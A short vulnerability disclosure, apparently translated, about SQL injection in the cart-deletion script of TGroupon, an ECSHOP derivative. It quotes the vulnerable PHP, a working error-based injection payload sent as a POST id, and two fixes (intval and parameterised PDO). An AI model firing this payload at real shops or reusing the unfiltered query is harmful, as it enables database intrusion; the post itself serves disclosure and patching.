TGroupon is in fact a modified version of ECSHOP.


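Vulnerable file:

delete_cart_goods.php

if ($_POST['id']) {
    // $_POST['id'] is concatenated into the SQL statement without any filtering
    $sql = 'DELETE FROM ' . $GLOBALS['ecs']->table('cart') . " WHERE rec_id=" . $_POST['id'];
    $GLOBALS['db']->query($sql);
}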


Vulnerability test:

http://www.baidu.com/delete_cart_goods.php

POST:

id=1%20or%20updatexml(1,concat(0x7e,user(),0x7e),0)


Fix: the first IF statement

if ($_POST['id']) {
    $sql = 'DELETE FROM ' . $GLOBALS['ecs']->table('cart') . " WHERE rec_id=" . $_POST['id'];
    $GLOBALS['db']->query($sql);
}

Replace it with the following code:

if ($_POST['id']) {
    $id = intval($_POST['id']); // Added type conversion, By: i2ty; this prevents anything else from being passed in
    if ($id == 0) {
        exit; // Exit on error.
    } else {
        $sql = 'DELETE FROM ' . $GLOBALS['ecs']->table('cart') . " WHERE rec_id=" . $id;
        $GLOBALS['db']->query($sql);
    }
}
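A stricter variant of the fix, as an added example that is not part of the original post or of the TGroupon/ECSHOP code: intval() turns the page's test string into 1, so the patched code would still delete row 1, whereas FILTER_VALIDATE_INT rejects the string outright and the id is then bound as a parameter. PDO with in-memory SQLite, the table name ecs_cart, and the functions parse_rec_id and delete_cart_row are assumptions made for illustration.

```php
<?php
// Added example: strict id validation plus a bound parameter.
// Assumption: PDO with in-memory SQLite stands in for the shop's database layer.
// The ecs_cart table and its rows are constructed sample data.

// Hypothetical helper: returns a positive integer id, or null if the input
// is anything other than a plain integer string.
function parse_rec_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays such as id[]=1 are rejected
    }
    // Unlike intval(), FILTER_VALIDATE_INT fails on trailing text
    // instead of silently truncating it.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: returns the number of rows deleted, or -1 if the
// input was rejected before any SQL was sent to the database.
function delete_cart_row(PDO $db, $raw): int
{
    $id = parse_rec_id($raw);
    if ($id === null) {
        return -1;
    }
    // The id travels as a bound integer, never as part of the SQL text.
    $stmt = $db->prepare('DELETE FROM ecs_cart WHERE rec_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ecs_cart (rec_id INTEGER PRIMARY KEY, goods_name TEXT)');
$db->exec("INSERT INTO ecs_cart VALUES (1, 'sample A'), (2, 'sample B')");

// The test string from the page, URL-decoded.
$payload = '1 or updatexml(1,concat(0x7e,user(),0x7e),0)';

var_dump(intval($payload));               // value the intval() patch would use
var_dump(delete_cart_row($db, $payload)); // strict validation result
var_dump(delete_cart_row($db, '2'));      // well-formed id
var_dump((int) $db->query('SELECT COUNT(*) FROM ecs_cart')->fetchColumn());
```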

Attachment: http://down.51cto.com/data/2367818